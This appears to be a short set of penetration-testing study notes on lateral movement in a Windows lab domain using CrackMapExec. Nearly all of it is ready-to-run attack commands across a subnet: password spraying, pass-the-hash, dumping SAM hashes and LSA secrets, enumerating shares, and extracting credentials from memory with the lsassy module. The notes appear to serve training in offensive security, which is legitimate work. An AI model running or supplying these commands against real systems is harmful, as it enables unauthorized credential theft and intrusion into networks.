what is this?

If we crack a password and /or can dump the SAM hashes, we can leverage both for lateral movements in networks.

crackmapexec smb 10.10.10.0/24 -u fcastle -d MARVEL.local -p Password1

Pass the Hash attack

crackmapexec smb 10.10.10.0/24 -u administrator -H szrdfjcgvblh;kml --local-auth

dump directly sam

	crackmapexec smb 10.10.10.0/24 -u administrator -H szrdfjcgvblh;kml --local-auth --sam

enumerate shares

crackmapexec smb 10.10.10.0/24 -u administrator -H szrdfjcgvblh;kml --local-auth --shares

dump local security authority

crackmapexec smb 10.10.10.0/24 -u administrator -H szrdfjcgvblh;kml --local-auth --lsa

Dumps if any secrets stored in memory. -M for module to define which can bee seen by -L

crackmapexec smb 10.10.10.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:fbdcd5041c96ddbd82224270b57f11fc --local-auth -M lsassy

Crackmapexec Database

cmedb
help
creds